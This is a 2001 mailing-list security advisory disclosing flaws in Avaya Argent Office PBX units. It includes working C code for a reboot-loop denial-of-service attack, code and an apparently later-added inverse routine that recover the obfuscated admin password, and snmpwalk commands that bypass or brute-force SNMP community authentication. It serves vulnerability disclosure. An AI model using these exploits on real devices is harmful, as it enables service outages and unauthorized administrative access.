Multiple vulnerabilities in Avaya Argent Office

From: Jacek Lipkowski (sq5bpfat_private)
Date: Tue Aug 07 2001 - 05:35:52 PDT


    Multiple vulnerabilities in Avaya Argent Office.
    
    Systems affected: Avaya Argent Office
    Impact: local dos attack
    
    The Argent branch of products (now known as the Network Alchemy line) from
    Avaya is a solution integrating a PBX, network connectivity, dial-on-demand
    networking etc. I had some security concerns when I looked at it.
    Since all of the issues below are only exploitable from the local network
    (and since this system is designed for small offices), they shouldn't be
    much of a problem.
    
    1. Local denial of service
    
    By sending a UDP packet with no payload to port 53, the Argent Office
    reboots. The unit comes back up very quickly, so one needs to send the
    packets repeatedly. Sample source code below:
    
    /* argent_kill.c
    (c) 2001 Jacek Lipkowski sq5bpfat_private
    Reboots an Argent Office box by sending udp packets with no payload to port 53
    usage: argent_kill ip_address
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <unistd.h>
    
    int main(int argc, char *argv[])
    {
    struct sockaddr_in addr;
    struct hostent *host;
    int s;
    
    if (argc!=2) { fprintf(stderr,"usage: %s ip_address\n",argv[0]); exit(1); }
    s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (s==-1) { perror("socket()"); exit(1); }
    host=gethostbyname(argv[1]);
    if (host==0) { herror("gethostbyname"); exit(1); }
    memset(&addr,0,sizeof(addr));
    memcpy(&addr.sin_addr,host->h_addr,host->h_length);
    addr.sin_port=htons(53);
    addr.sin_family=AF_INET;
    if (connect(s,(struct sockaddr *)&addr,sizeof(addr))==-1) { perror("connect()"); exit(1); }
    for (;;)
    {
    /* zero-length datagram: a UDP header with no payload at all */
    send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
    }
    close(s);
    return 0;
    }
    
    2. Easily decryptable configuration password
    
    Configuring the Argent Office is done through a strange TFTP look-alike. For
    example, to reboot a unit one must GET the following file via tftp:
    
    nasystem/rebootwhenfree/00e007002666/password//
    
    Where 00e007002666 is the MAC address of the unit and password is the
    obfuscated password. Since this packet is easily sniffed and the
    obfuscation algorithm never changes, anyone with a sniffer can easily
    obtain administrative privileges. The obfuscation mechanism is rather
    simple, as the following example demonstrates:
    
    /* argent_obfuscate.c
    (c) 2001 Jacek Lipkowski sq5bpfat_private
    demonstrates how the password obfuscation
    mechanism works in argent office products */
    
    #include <stdio.h>
    #include <string.h>
    
    int main(int argc,char **argv)
    {
    int i;
    const unsigned char *buf;
    if (argc!=2) { fprintf(stderr,"usage: %s password\n",argv[0]); return 1; }
    /* read the password in place instead of copying it into a fixed buffer */
    buf=(const unsigned char *)argv[1];
    /* each byte is shifted by 0x11, minus its position in the string */
    for (i=0;i<strlen(argv[1]);i++)
    printf("0x%2.2X ",(unsigned)(buf[i]+0x11-i));
    printf("\n");
    return 0;
    }
    
    Showing the hex values for the password 'idiocy':
    
    ~$ ./argent_obfuscate idiocy
    0x7A 0x74 0x78 0x7D 0x70 0x85
    
    Writing a decryption routine is left as an exercise to the reader :)
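The point of the section above is that this is a per-byte shift, not encryption: the same arithmetic run backwards recovers the password. The following is an added example, not code from the advisory or from Avaya, that puts the transform the advisory observed (out[i] = in[i] + 0x11 - i) beside its inverse and round-trips a sample. The function names, the 32-byte limit and the use of "idiocy" as a constructed sample are assumptions.

```c
/* Added example, not from the original advisory: the Argent Office password
 * obfuscation as observed there, plus its inverse, to show it is reversible.
 * Function names, MAX_PW and the sample password are assumptions. */
#include <stdio.h>
#include <string.h>

#define MAX_PW 32

/* Forward direction as observed in the advisory: out[i] = in[i] + 0x11 - i.
 * Returns the number of bytes written, or -1 if the input does not fit. */
int argent_obfuscate(const char *pw, unsigned char *out, size_t outlen)
{
    size_t n = strlen(pw);
    size_t i;
    if (n > outlen) return -1;
    for (i = 0; i < n; i++)
        out[i] = (unsigned char)((unsigned char)pw[i] + 0x11 - i);
    return (int)n;
}

/* Inverse: subtract the constant and add the position back. */
int argent_deobfuscate(const unsigned char *obf, size_t n, char *out, size_t outlen)
{
    size_t i;
    if (n + 1 > outlen) return -1;
    for (i = 0; i < n; i++)
        out[i] = (char)(obf[i] - 0x11 + i);
    out[n] = '\0';
    return (int)n;
}

/* Returns 1 when deobfuscate(obfuscate(pw)) gives pw back unchanged. */
int argent_roundtrip_ok(const char *pw)
{
    unsigned char obf[MAX_PW];
    char back[MAX_PW + 1];
    int n = argent_obfuscate(pw, obf, sizeof obf);
    if (n < 0) return 0;
    if (argent_deobfuscate(obf, (size_t)n, back, sizeof back) < 0) return 0;
    return strcmp(pw, back) == 0;
}

int main(void)
{
    const char *sample = "idiocy";   /* constructed sample, same as the advisory's */
    unsigned char obf[MAX_PW];
    int n = argent_obfuscate(sample, obf, sizeof obf), i;
    for (i = 0; i < n; i++) printf("0x%2.2X ", obf[i]);
    printf("\nround trip ok: %d\n", argent_roundtrip_ok(sample));
    return 0;
}
```

Because the transform has no key, anyone who captures the tftp request carries everything needed to recover the password; the defensive lesson is that an obfuscated credential on the wire is equivalent to a cleartext one.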
    
    3. Dumb SNMP handling
    
    This is a really good one! The software does SNMP authentication via
    something similar to:
    
    if (strncmp(n,c,strlen(n))==0) { ok, valid community }
    
    Where c is the community string and n is the community string from the
    network.
    
    So basically if the size of the password in the packet is 0 then the
    authentication is ok :)
    
    ~$ snmpwalk 192.168.1.234 "" system.sysDescr.0
    system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
    
    You could also guess the community string character by character.
    
    guess the first letter:
    ~$ snmpwalk 192.168.1.234 a system.sysDescr.0
    Timeout: No Response from 192.168.1.234
    [the first letter is not a]
    [several combinations later, is it p?]
    ~$ snmpwalk 192.168.1.234 p system.sysDescr.0
    system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
    
    [ok we have the first letter, let's go for the second]
    ~$ snmpwalk 192.168.1.234 pa system.sysDescr.0
    Timeout: No Response from 192.168.1.234
    [the second letter is not a]
    [several combinations later, is it r?]
    ~$ snmpwalk 192.168.1.234 pr system.sysDescr.0
    system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
    
    etc... (the community is 'private')
    
    While not much is gained by using SNMP here, the community may be some
    company-wide standard, and knowing it may open other doors.
    
    
    4. Broadcast tftp requests
    
    The system in its default config requests a file called HoldMusic via
    tftp from the broadcast address. You could probably serve the file and
    change your company's music-on-hold tune to something more interesting :).
    
    
    
    
    All these vulnerabilities can be exercised only from internal interfaces
    (I haven't found a way to kill it from the dialup interface), so the
    impact is usually minor (the local staff could launch a much more
    destructive DoS attack using a hammer), unless your network is public or
    has other entry points.
    
    
    The standard disclaimer applies: if you do any damage, it's your problem,
    not mine (and neither is it my employer's).
    
    
    -------------------------------------------------------
    Andra Sp. z o.o.    Jacek Lipkowski sq5bpfat_private
    ul. Wynalazek 6              Network Systems Specialist
    02-677 Warsaw, Poland       tel. (+4822)6404873 wew 250
    -------------------------------------------------------
    



    This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 06:10:13 PDT